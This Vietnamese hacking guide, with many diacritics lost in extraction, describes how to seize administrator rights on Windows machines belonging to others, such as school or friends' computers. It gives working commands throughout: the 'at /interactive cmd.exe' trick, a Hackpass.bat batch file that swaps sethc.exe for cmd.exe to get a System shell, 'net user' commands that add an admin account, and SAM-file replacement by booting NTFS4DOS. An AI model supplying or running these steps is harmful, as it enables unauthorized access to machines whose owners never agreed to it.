Cướp quyn Admin trong vòng 1 phút vi quyn User
Trò này chơi trường hc hoc đến nhà bn đẻ quy cũng rt vui..
VD: khi đang ch là guest hoc user thung bn s biến thành admin system trong 1 phút và làm
cái gì tu thích..
- Hung dn:
m hp RUN.. hoc nhn nut window + R
gõ: cmd nhn enter để m ca s DOS đen xì
Sau đó gõ lnh sau:
Code:
at TIME /interactive "cmd.exe"
(TIME là gi tính theo h thng cng thêm 1 phút , vd bn máy bn là 10:49 pm thì time s là
22:50 )
sau đó đợi mt lúc nó s hin ra ca s DOS khác .. đóng cái cũ li
Sau đó nhn nút
Ctr + Alt + Deleteđể hin hp h thng system,,
Chn
Tab Processsau đó tìm file
explorer.exesau đó nhn nut KILL để xoá explorer ra khi h thng ..
Lúc này h thơng s t đng swich user ngm và t động đăng nhp vi quyn cao nht là Admin
SYSTEM..
Hướng Dn Cướp Quyn Admin
Nếu bn chu khó tìm thì trên mng có nhiu kinh nghim v chuyn này lm! Mình thì không cn
vì lúc nào cũng nghim nhiên có quyn Admin ri. Coi chng bn hc my chiêu này b ông
anh ...bp đó nghe!
Đây là tài liu mình sưu tm trên mng - chưa vc nên bn c th nhé!
Cách 1:
Đầu tiên bn vào Start/Run /gõ lnh cmd /ok
Ti du nhc Dos bn đánh tiếp lnh NET USER ----> Nó s hin ra tt c các tài khon đã được
to trên máy tính (trong đó có user ca admin). tiếp theo bn đánh tiếp lnh NET USER (user
admin) sau đó bn type pass mi vào đó là xong.
Chú ý :Cách này ch dùng đc. khi acc user ca bn đc. add trong group Admin và tên tài khon
Admin ko có du cách
Mo:
Mình có 1 mo nh này : Nếu bn logon vào 1 máy tính cái winxp và đòi password đơn gin thôi:
Hãy th n Ctrl +Altr + Del 3 ln xem.
Khi đó 1 ca s login mi s xut hin, bn đin vào name :"administrator",
ô password thì khi đin gì hết
Chú ý : Cách này dùng nếu tài khon Administrator không đặt pass và máy local
Cách 2:
Hin nay không có quá nhiu cách để phc hi mt khu ca tài khon dministrator trong
Windows b quên mt. Có th k đến là dùng công c h tr ca đĩa Hiren Boot để xóa trng mt
khu ca tài khon Administrator hay dùng các công c dò tìm mt khu trên Net. Tuy vy, không
phi lúc nào chúng ta cũng có công c để dùng. Nếu gp nhng lúc như thế.... hãy li dng l
hng ca file sethc.exe trên Windows. Trên Windows XP, nếu bn nhp phím Shift 5 ln,
Windows s gi mt chương trình nh có tên là StickyKey. Đây là chương trình h tr người
khuyết tt khi s dng Windows XP được đính kèm mc đinh trong b tin ích ca Windows. Nếu
bn đăng nhp bng tài khon có tên User1 và nhp phím Shift 5 ln để gi chương trình này,
Windows s ly quyn ca User1 để gi chương trình StickyKey. Nếu bn không đăng nhp vào
bt k mt tài khon nào mà gi được StickyKey thì Widnows s ly quyên ca h thng
(System) để chy StickyKey.
T gi định trên, nếu bn thay thế file thc thi ca chương trình StickyKey (sethc.exe) bng
chương trình Command Run (cmd.exe) và gi nó bng 5 ln phím Shift mà không đăng nhp
bng tài khon nào c thì windows s dùng quyn ca H thng (system) gi file cmd.exe thay vì
file sethc.exe. Thế là có th làm bt c chuyn gì bng tài khon ca cao nht (quyn ca H
thng) trên chương trình Command Run.
Vì vy:
Bước 1: Vào windows vi tài khon User bình thường và nhn 5 ln phím Shift để gi th chương
trình StickyKey trên Windows và đóng nó li (ch nhm để xem th).
Bước 2: Vào Start >> Run >> nhp vào Notepad và Enter để gi chương trình Notepad.exe. Copy
đon mã sau, past vào notepad, Save li vi tên là Hackpass.bat
Code:
*********************
echo off
cls
cd %systemroot%/system32
rename sethc.exe sethc.exe.bk
copy cmd.exe sethc.exe /y
*********************
Sau đó nhp kép chut lên file Hackpass.bat để thc thi!
Đon mã này làm các nhim v sau:
1. Sao lưu li file sethc.exe bng cách đặt li tên là sethc.exe.bk
2. Thay thế file sethc.exe bng file cmd.exe
Đến đây, bn nhp phím Shift 5 ln, nếu chương trình Command Run đưc gi thay vì chương
trình StickyKey thì bn đã thành công!
Bước 3: Khi động li máy. Khi đến màn hình đăng nhp, bn khoan hãy đăng nhp mà nhn
phím Shift 5 ln...... Lúc này chương trình Command Run xut hin, bn nhp mt trong nhng
vào đon lnh dưới đây
Xóa trng password ca Administrator:
Code:
net user Administrator
---- > nhn phím Enter khi hoàn thành!
Thêm mt tài khon Admin vi mt khu là 123
Code:
net user Admin 123 /add
---- > nhn phím Enter khi hoàn thành!
Gán tài khon Admin vào nhóm qun tr:
Code:
net localgroup Administrators Admin /add
---- > nhn phím Enter khi hoàn thành!
Nếu bn s dng đúng cu trúc lnh phía trên, bn s to được các tài khon mi. Ti đây, bn
có th đăng nhp vào các tài khon mi mà không cn khi động li máy!
Cách 3: Đot quyn Adim trong Win 2000, 2003, XP
1. Cách đot quyn Admin trong Win2K :
- Trước hết bn phi Download phn mm NTFS4DOS v để to đĩa khi động có th nhìn được
đĩa có phân vùng NTFS .
- Sau khi Download v bn tiến hành cài đặt và to đĩa mm khi động ( Chú ý : Trước khi to đĩa
mm khi động có th nhìn thy phân vùng NTFS thì đĩa mm ca bn phi được Format và là
đĩa Boot có th boot được t DOS t trước thì mi có th dùng phn mm NTFS4DOS để to đĩa
mm có th nhìn được phân vùng NTFS t DOS ) . Thế là xong bước to đĩa mm boot .
- Tiếp theo bn đến cái máy mà bn mun đot quyn Admin và vào CMOS ca nó đặt First Boot
là : Floppy Driver ( Nếu máy đó đặt password CMOS thì bn có th phá Pass CMOS bng các
phn mm khác , tui xin min hướng dn phn này ) .
- Sau khi khi động và Boot bng đĩa mm s hin ra 3 phn cho bn chn , bn chn cái đầu
tiên là : NTFS4DOS . Sau đó bn c để mc cho nó chy tiếp. Tiếp sau đó nó s hin ra mt
dòng thông báo hi bn có mun s dng tin ích NTFS4DOS ko ? bn đánh ch yes và n
Enter .
sau đó nó s hin ra dòng A:\> bn chuyn sang đĩa cng là phân vùng chính cài Win ( đây
tôi s ly ví d là C
A:\> C:
C:\> cd WINNT\SYSTEM32\CONFIG ( dùng lnh cd để chuyn đến thư mc WINNT\SYSTEM32\
CONFIG
Tiếp tc : Ti C:\>WINNT\SYSTEM32\CONFIG bn đánh lnh dir
C:\>WINNT\SYSTEM32\CONFIG\dir
Ta s nhìn thy file có tên là : SAM
Tiếp tc ti du nhc lnh : C:\>WINNT\SYSTEM32\CONFIG bn đánh lnh
C:\>WINNT\SYSTEM32\CONFIG\ren SAM DUNG
sau đó bn đánh th li lnh Dir để kim tra xem đã có file tên DUNG chưa ? Nếu có ri thì đẫ
thành công .
Chú ý : Tt nht là trước khi đánh lnh ren SAM DUNG để đổi tên file SAM bn lên backup nó
trứơc :
C:\>WINNT\SYSTEM32\CONFIG\md Backup (Để to thư mc backup)
C:\>WINNT\SYSTEM32\CONFIG\copy SAM C:\>WINNT\SYSTEM32\CONFIG\BACKUP ( làm
như vy cho chc ăn )
Sau đó bn restart li máy thế là OK , khi đăng nhp vào máy bn ch cn gõ User là :
Administrator còn Password thì không cn đánh ch vic gõ Enter .
2. Cách đot quyn Admin trong WinXP :
- Cách làm thì tương t như là trog Win2K , nhưng như các bn đã biết nếu như chúng ta cũng
đổi tên file SAM như trong WIN2K thì chc chn là WinXP s b li và không th nào vào được
Win ( S b Restart li máy )
- Vy thì làm cách nào có th đot được qun Administrator bi gi ? .
Có mt cách và tui đã th thành công , không biết các bn đã đoán ra chưa nh , nếu ai biết rùi thì
thui nhé , tui post cho nhng người chưa biết .
- Đầu tiên tui cũng chưa biết làm thế nào, nhưng v sau tui đã đánh liu và th mt cách như
sau :
+ Tui đến mt máy cài WinXP khác , tui to Pass ca user có tên là Administrator là trng (Nghĩa
là không đặt password , password b trng) , tui khi động li máy , sau đó tui vào DOS và copy
li cái file SAM cái máy mà tui va to vi pass ca User : Administrator (Đây là người có quyn
qun tr cao nht) là trng vào thư mc BACKUP trong đĩa mm ca tui.
+ Sau đó tui sang cái máy cài WinXP mà tui mun cướp quyn Admin ( Vi pass ca
Administrator mà tui không biết )
+ và tui làm y như các bước như trên ( Chú ý : Trong WINXP thì không phi là thư mc WINNT
như trong Win2K mà nó là thư mc WINDOWS) :
Sau khi khi động và Boot bng đĩa mm s hin ra 3 phn cho bn chn , bn chn cái đầu tiên
là : NTFS4DOS . Sau đó bn c để mc cho nó chy tiếp. Tiếp sau đó nó s hin ra mt dòng
thông báo hi bn có mun s dng tin ích NTFS4DOS ko ? bn đánh ch yes và n Enter .
sau đó nó s hin ra dòng A:\> bn chuyn sang đĩa cng là phân vùng chính cài Win ( đây
tôi s ly ví d là C
A:\> C:
C:\> cd WINDOWS\SYSTEM32\CONFIG ( dùng lnh cd để chuyn đến thư mc
WINDOWS\SYSTEM32\CONFIG
Tiếp tc : Ti C:\>WINDOWS\SYSTEM32\CONFIG bn đánh lnh dir
C:\>WINDOWS\SYSTEM32\CONFIG\dir
Ta s nhìn thy file có tên là : SAM
Tiếp tc ti du nhc lnh : C:\>WINDOWS\SYSTEM32\CONFIG bn đánh lnh
C:\>WINDOWS\SYSTEM32\CONFIG\ren SAM DUNG
sau đó bn đánh th li lnh Dir để kim tra xem đã có file tên DUNG chưa ? Nếu có ri thì đẫ
thành công .
Chú ý : Tt nht là trước khi đánh lnh ren SAM DUNG để đổi tên file SAM bn lên backup nó
trứơc :
C:\>WINDOWS\SYSTEM32\CONFIG\md Backup (Để to thư mc backup)
C:\>WINDOWS\SYSTEM32\CONFIG\copy SAM C:\>WINDOWS\SYSTEM32\CONFIG\BACKUP
( làm như vy cho chc ăn )
- Tiếp theo t C:\>WINDOWS\SYSTEM32\CONFIG tui đánh lnh
C:\>WINDOWS\SYSTEM32\CONFIG A: để chuyn sang mm A
- Ti A ta đánh lnh A:\>cd Backup để vào thư mc BACKUP trong A .
- Ti A:\>BACKUP> ta đánh lnh dir để kim tra xem đã thy file SAM trong đó chưa
A\BACKUP>dir
- T A\BACKUP\ ta đánh lnh :
A\BACKUP\copy SAM C:\>WINDOWS\SYSTEM32\CONFIG (Chú ý : Trước khi đánh lnh trên thì
bn phi chc chn là file SAM trong thư mc C:\>WINDOWS\SYSTEM32\CONFIG đã được
đổi tên thành tên khác )
- Sau khi đánh lnh trên xong nếu copy thành công bn s nhn được 1 thông báo là : 1 file
copy ... gì gì đó tui không nh lm . Sau đó bn khi động li máy và b đĩa mm ra .
- Khi đăng nhp vào máy bn gõ user là Administrator và password là trng bn c vic gõ Enter
thế là Okie gi đây bn đã là Người có quyn qun tr cao nht.